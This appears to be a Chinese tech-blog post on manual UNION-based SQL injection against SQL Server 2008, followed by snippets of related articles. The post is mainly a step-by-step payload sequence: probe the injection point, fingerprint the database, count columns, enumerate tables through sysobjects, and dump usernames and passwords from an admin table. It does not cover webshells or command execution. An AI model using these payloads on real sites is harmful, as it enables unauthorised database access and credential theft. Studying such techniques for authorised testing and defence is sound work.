SQL注入--sql server

最新推荐文章于 2024-05-15 22:06:46 发布
最新推荐文章于 2024-05-15 22:06:46 发布
阅读量955 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: 渗透测试 文章标签: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/pygain/article/details/52733747
本文介绍SQL注入的基础原理及实战步骤,包括如何判断注入点、确定数据库类型、获取数据库信息等,详细展示了针对SQL Server 2008的具体操作流程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

谈到SQL注入,不得不提它的本质,把用户的输入数据当做代码来执行。两个关键条件,第一个是用户能够控制的输入;第二个是程序要执行的代码,拼接了用户输入的数据

按照注入的技术类型可分解为:

显错注入和盲注入,其中盲注入可分为,联合查询注入,堆查询注入,DNS查询注入,报错注入,延时注入和布尔注入。这篇文章重点在分享一些联合查询注入的命令


1.首先来判断注入点(URL类)

当目标URL为:www.target.com/1.php?id=88时,来进行简单的注入点判断;

www.target.com/1.php?id=88-0 无变化
www.target.com/1.php?id=88-1 报错


www.target.com/1.php?id=88 and 1=1 无变化
www.target.com/1.php?id=88-1 and 1=2 报错

2.判断是何种数据库
URL+/*!%20s*/ 错误则是MySQL;URL+/*pc 正常为MySQL

URL+and exists(select @@version)-- 正常为SQL Server

3.SQL Server 2008注入过程

判断字段数:

id=1/**/Order/**/By/**/5/**/-- 正常则字段数≥5      --和/**/均为注释用来注释执行语句时的代码 保证注入代码正常执行
id=1/**/Order/**/By/**/6/**/-- 错误则字段数<6

判断数据类型,字符型就可以SQL注入了

id=1/**/union/**/all/**/select/**/NULL,NULL,NULL,NULL,NULL--   正常
id=1/**/union/**/all/**/select/**/NULL,NULL,’test’,NULL,NULL--    正常 (一位一位去尝试)

显示数据库版本
id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,NULL,@@version,NULL,NULL--

当前库名
and/**/1=2/**/union/**/all/**/select/**/NULL,db_name(),NULL,NULL,NULL from sysobjects--

指定库表名
and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from库名..sysobjects where xtype='u' and name not in(select top 0 name from 库名..sysobjects where
xtype='u')),NULL,NULL,NULL from sysobjects--

当前库查询表

and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from sysobjects where xtype='u' and name not in(select top 0 name from sysobjects where
xtype='u')),NULL,NULL,NULL from sysobjects--     //第二个top从0开始输入 1,2,....列出当前库所有表名

查询admin变内的字段

d=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name='admin') and name not in (select top 1 name from syscolumns where id in (select id from sysobjects where name='admin'))),NULL,NULL,NULL fromsysobjects--//第二个top从0开始遍历

查看admin变字段id,username,password的内容

id=1 and 1=2 union all select id,username,password,NULL,NULL from admin--

webshell写入和系统命令执行就不能再分享了





SQL注入-基于MSsql(sql server)的注入
LJH1999ZN的博客
02-13 7473
目录 一、如何判断该网站使用的是sql server 数据库 二、sql server 数据库包含三张主要系统表 三、sql server 主要函数 四、数据库的注入流程 五、sql server 的联合查询 六、sql server 的报错注入 七、sql server 的布尔型盲注。 一、如何判断该网站使用的是sql server 数据库 根据后缀判断:如果后缀为aspx,数据库大概是sql server 根据报错信息判断,报错信息中有Microsoft 字样。 根据系统表判断,a
SQL server注入
weixin_45958861的博客
09-20 1658
较为复杂 一般不用手工 用工具 1.注入语句 ①*判断数据库类型 and exists (select * from sysobjects)–返回正常为mssql(也名sql server) and exists (select count() from sysobjects)–有时上面那个语句不行就试试这个哈 ②判断数据库版本 and 1=@@version–这个语句要在有回显的模式下才可以哦 and substring((select @@version),22,4)=‘2008’–适用
SQL Server注入大全及防御
网络 人生 学习 进步
09-17 1506
  SQL Server是中小型网站广泛使用的数据库,由于功能强大也滋生了很多安全问题,国内又因为SQL注入攻击的很长一段时间流行,导致对SQL Server的入侵技巧也层出不穷,由于SQL Server支持多语句,相信很多小黑在对SQL Server进去SQL注入的时候很少使用猜解表名之类的方法,而直接转向使用SQL Server的存储过程和函数快速的拿权限,下面我就围绕SQL Server的系
1、sql server数据库进行sql注入
weixin_51520483的博客
05-15 1318
1、判断数据类型是很重要的一点,影响后面的注入语句2、确定列数时,要多测几组数据,从而分析判断列数,并不是遇到第一个报错就停止测试3、正常网页(例如id=1,参数正确)没有注入回显时,试试报错情况(id=-1),注入回显有可能被正常返回数据覆盖4、注入回显的字段有可能整形、字符、小数等,注意是否需要单引号5、最好先全部统一会先字段类型,比如全部整形,挨个轮流改变为字符形。
SQL Server 注入
mingyqf的博客
03-22 2663
SQL Server 注入 (转至:https://www.1024sou.com/article/798425.html) 侵删 一、简介 SQL Server数据库是由Microsoft开发和推广的关系数据库管理系统(DBMS),是一个比较大型的数据库。端口号为1433。数据库后缀名 .mdf,注释符是 – sa权限:数据库操作,文件管理,命令执行,注册表读取等 (数据库最高权限system) db权限:文件管理,数据库操作等权限 users-administrators **public权限:**数
java 连接sqlserver使用的java-sqlserver-connect.jar包
04-09
在本例中,我们关注的是"java-sqlserver-connect.jar",这是一个专门为Java应用程序提供与Microsoft SQL Server数据库交互功能的库。这个JAR文件支持两个不同的Java运行时环境(JRE),即JRE7和JRE8。 首先,了解...
网络安全-sql注入-sqlmap
最新发布
09-02
其中,SQL注入攻击是一种常见的网络安全威胁,它是一种代码注入技术,通过在Web表单输入或页面请求的查询字符串中注入恶意的SQL代码,攻击者可以操纵后端数据库,从而获得未授权的数据库访问权限,对数据进行读取、...
sqlserver-demo:Spring Boot + Mybatis-Plus + SQLServer
03-04
以上就是"sqlserver-demo"项目涉及的核心知识点,通过这个项目,你可以深入了解如何在Spring Boot应用中集成Mybatis-Plus和SQLServer,以及如何构建一个高效、稳定的数据库操作层。在实际开发过程中,还需要不断学习...
09-sql注入-mssql1
08-03
SQL注入是一种常见的安全漏洞,攻击者通过输入恶意SQL语句来获取未授权的数据或执行恶意操作。针对SQL Server,攻击者可能使用的注入技术包括: 1. 判断是否存在注入漏洞。 2. 确定数据库类型。 3. 猜测表名和字段。...
SQL Server注入
weixin_34129145的博客
11-05 136
1.利用错误消息提取信息 1.1 枚举当前表与列 select * from users where username='root' and password='root' having 1=1--' 抛出错误:选择列表中的列 'users.id' 无效,因为该列没有包含在聚合函数或 GROUP BY 子句中。   发现表名为 'users',存在列名为 'id' sele...
SQL注入的一个ASP网站源码
02-06
SQL注入的一个ASP网站源码,ASP+ACCESS手动注入环境搭建,用来练手不错! 带SQL注入的一个ASP网站源码,ASP+ACCESS手动注入环境搭建,用来练手不错!
sql server 2008 mysql 手工注入
03-25
本人原创 sql server 2008 mysql 手工注入 里面有源码和数据库文件 还有用于测试的项目
整理出来的SQL注入点关键字
03-06
整理出来的关于SQL注入时所需要的关键字,很全面,覆盖了很多,包括asp,php等等
专门针对SQL Server注入手段
Wayne_Deng的专栏
07-13 1328
小弟潜心研究sql injection一个余月,发现国内存在sql injection漏洞的网站一大把一大把,80%以上的asp网站都似乎是不学无术、骗吃骗喝的“程序员”所做。不光漏洞多,而且网站内部结构也是零乱无比…… 关于sql injection网上流传甚广的SQL注入天书可以说是非常不错的入门介绍了,在这里也要重复一些老套的手法。 首先上手的都是1=1,1=2的方法测试验证漏洞,字符则用
SQL server 中的SQL 注入
d1996a的博客
09-27 478
SQL server 中的sql注入 实验环境: 在windows server 2008虚拟机中安装SQL server 数据库。安装phpstudy ,通过一台Windows7 访问连接windows server 2008. SQL server 联合注入 首先判断注入点,输入id=1,页面正常回显。 首先判断是否是数值型: id=1 and 1=1,页面正常回显 id=1 and 1=2,页面空显示,可以判断是数值型。 因为有显示位,可以用联合注入进行注入。 首先判断显示位,由此可以看出显示位
【网络安全-SQL注入(4)】一篇文章带你了解sql server数据库三大权限,以及三大权限的SQL注入SQL注入点利用以及getshell
m0_67844671的博客
10-02 3016
【网络安全-SQL注入SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】-优快云博客本篇文章以凡诺企业网站管理系统为例,讲解了access数据库是如何进行SQL注入的,以及注入点如何利用,如何判断查询字段个数,如果用联合查询爆出数据库数据等;【网络安全-SQL注入SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】;
2004-8-5+ 给mssql添加用户
weixin_34113237的博客
06-29 128
打开管理器,找到需要添加用户的数据库,点开,右键单击用户,选择“新建数据库用户”,弹出“数据库用户属性-新建用户”,填好登陆名和用户名,分配好角色,然后就可以啦。先看登陆名。一般从下拉列表里选“新建”,跳出“sql server登录属性-新建登录”,然后在这里填名称,设定sel servr身份验证的密码,然后从下拉列表里选一个数据库,就是你要添加用户的那个,完事后确定。这样在登陆名下拉列表就会多出...
sqlserver注入
ka_ka11的博客
04-22 676
1.判断权限大小,即xcmd_shell能不能用 2.数据库,表,列的逻辑问题
SQL Server手工注入方式
渗透之路,攻防之间皆学问
01-04 7177
本文详细的介绍了Sql Server安全基础,包括环境搭建,T-sql语法,sqlserver用户权限,以及sqlserver注入的方法和提权方式。 Microsoft SQL Server(微软结构化查询语言服务器),也叫Mssql,是由美国微软公司所推出的关系型数据库。默认端口号为1433常见版本如下版本年份发布名称8.02000年8.02003年SQL Server 2000 64-bit版本9.02005年10.02008年10.252009年SQL Azure。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值